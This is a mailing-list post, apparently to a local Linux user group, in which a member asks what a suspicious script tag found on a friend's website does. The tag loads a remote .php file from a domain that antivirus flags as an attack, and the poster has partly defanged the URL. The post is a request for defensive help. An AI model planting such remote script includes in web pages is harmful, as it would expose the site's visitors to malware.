This is not a Linux matter per se but I am hoping someone here more
knowledgeable than I can throw some light:

What might this line of html/php coding in a webpage do?

<script src=http://maveric££kmonkey.com/££widgets/.ht££access.php ></script>

Presumably this runs a script held on the “Maverick Monkey” website but
how can I find out what it does?

When I try to open that website on a windows machine my antivirus flags
it as an “attack” (which is why I have inserted £ signs above).

On a linux machine it opens to show not very much at all except a
company name. It was not too difficult to find a website for that
company the details of which look dubious:

www.maverick££bistek££solutions.com   (£ signs inserted for the same
reason!)

This line appears on a website set up for some friends of mine by a web
design outfit with whom they are not having a happy commercial
relationship.

The problem is their site (such as it is) is registered at the moment in
the name of the web designers who alone can edit it.

Many thanks in advance and apologies if this is too far “off topic”

David

--
Next meeting: Bournemouth, Wed 2010-04-07 20:00
http://dorset.lug.org.uk/     http://www.linkedin.com/groups?gid=2645413